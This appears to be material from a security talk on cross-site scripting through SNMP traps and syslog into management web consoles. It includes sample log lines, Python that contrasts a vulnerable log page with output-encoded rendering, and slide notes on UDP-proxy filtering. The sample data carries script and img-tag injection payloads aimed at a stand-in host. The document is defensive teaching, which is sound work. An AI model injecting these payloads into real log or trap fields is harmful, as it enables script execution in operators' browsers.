Sep 25 02:39:12 kali lighttpd[8372]: /usr/bin/tail: cannot open '/var/log/messages' for reading: Permission denied
Sep 25 02:40:34 kali lighttpd[8372]: /usr/bin/tail: cannot open '/var/log/messages' for reading: Permission denied
Sep 25 02:45:01 kali CRON[8550]: (root) CMD (command -v debian-sa1 > /dev/null && debian-sa1 1 1)
Sep 25 02:47:27 kali root: chuckc
Sep 25 02:48:57 kali root: \
Sep 25 02:50:22 kali root: \
Sep 25 02:51:06 kali root: \
Sep 25 02:55:01 kali CRON[8627]: (root) CMD (command -v debian-sa1 > /dev/null && debian-sa1 1 1)
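Added example, not the talk's snmpRequest/syslog4j commands nor its showlog CGI: the same log page rendered with output encoding, and a trap varbind rendered the way the "Good Apps" slide shows it. The sample syslog lines are constructed in the slide's format; the injected content is the payloads from the XSS examples and the "Example string" slide, and the `eventHref` class name is borrowed from the slide only as a label.

```python
# Added example (not the talk's snmpRequest/syslog4j nor its showlog CGI): the same
# log page with output encoding, plus a trap varbind rendered as the "Good Apps" do.
import html
import re

# Constructed syslog lines in the slide's format; the last three carry payloads
# taken from the XSS examples and the "Example string" slide above.
SAMPLE_SYSLOG = [
    "Sep 25 02:45:01 kali CRON[8550]: (root) CMD (command -v debian-sa1 > /dev/null && debian-sa1 1 1)",
    "Sep 25 02:47:27 kali root: chuckc",
    'Sep 25 02:48:57 kali root: <script>alert("TEST");</script>',
    "Sep 25 02:50:22 kali root: <img src=http://badsite.net/gotya.swf>",
    "Sep 25 02:51:06 kali root: <src=http://181.224.145.117/wp-content/uploads/2015/11/tavve_logo.gif.gif/>",
]

_CONTROL = re.compile(r"[\x00-\x08\x0a-\x1f\x7f]")   # below space except tab, plus DEL
_URL = re.compile(r"https?://[^\s<>\"']+")           # http(s) only: javascript: never links

def bad_showlog(lines) -> str:
    """What the showlog CGI on the slide does: raw log text dropped inside <pre>."""
    return ("<HTML>Last 100 lines of /var/log/syslog:<br><pre>"
            + "\n".join(lines) + "</BODY></HTML>")

def encode_text(value: str) -> str:
    """Encode for an HTML text or quoted-attribute context: & < > " ' become
    entities; control characters (which can also forge extra log lines) become '?'."""
    return html.escape(_CONTROL.sub("?", value), quote=True)

def safe_showlog(lines, limit: int = 100) -> str:
    """Same page, but every log line passes through encode_text before emission."""
    shown = lines[-limit:]
    body = "\n".join(encode_text(line) for line in shown)
    return ("<!DOCTYPE html><html><body>Last %d lines of /var/log/syslog:<br>"
            "<pre>%s</pre></body></html>" % (len(shown), body))

def safe_varbind(name: str, value: str) -> str:
    """Render one trap varbind like the 'Good Apps' slide: text encoded, any http(s)
    URL inside it linked, with the href built from the encoded value."""
    out, pos = [], 0
    for m in _URL.finditer(value):
        out.append(encode_text(value[pos:m.start()]))
        url = encode_text(m.group())
        out.append("<a class='eventHref' href='%s'>%s</a>" % (url, url))
        pos = m.end()
    out.append(encode_text(value[pos:]))
    return "%s=%s" % (encode_text(name), "".join(out))

def leaks_markup(rendered: str) -> bool:
    """Crude tester's check: did attacker-supplied tags survive into the page?"""
    return re.search(r"<(script|img|src)\b", rendered, re.I) is not None
```

`bad_showlog` reproduces the CGI's behaviour and the injected `<script>` and `<img>` survive into the page; `safe_showlog` emits the same lines as `&lt;script&gt;...`, so the browser shows them as text. `safe_varbind` links only `http(s)://` values, so a `javascript:` varbind is printed, not linked, and because the URL regex stops at quotes and the href is built from the encoded value, the attribute cannot be broken out of. The encoding is the fix the OWASP text above calls for; validation of what arrives by trap or syslog is still worth doing, but it cannot replace encoding at output time.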
Filter/fix Incoming traps/syslogs
(Slide diagram: the external managed node 20.20.20.20 sends SNMP traps / syslog to the internal management servers 10.10.10.10 (Prod1), 10.10.10.11 (Prod2) and 10.10.10.12 (Test) – by normal IP routing, through a firewall NAT (outside address 20.20.20.10; with static NAT, 20.20.20.10, 20.20.20.11 and 20.20.20.12 map one-to-one inside), or via a UDP proxy at 20.20.20.15.)
UDP = SNMP Traps, Syslog, NetFlow
• Normal IP Routing – No data cleanup
• FW NATs internal – No data cleanup
• UDP Proxy – Packet recreated. Options to maintain or replace data field. Filter packets.
Internal Address Hiding
• Normal IP Routing – Trap/Syslog Dest: 10.10.10.10
• FW NATs internal – Trap/Syslog Dest: 20.20.20.10
• UDP Proxy – Trap/Syslog Dest: 20.20.20.15
Reduce Destination List (configured on the managed node)
• Normal IP Routing – Trap Destinations: 10.10.10.10, 10.10.10.11, 10.10.10.12
• FW Static NAT inside – Trap Destinations: 20.20.20.10, 20.20.20.11, 20.20.20.12
• UDP Proxy – Trap Destination: 20.20.20.15 (proxy does fanout to Prod1, Prod2 and Test)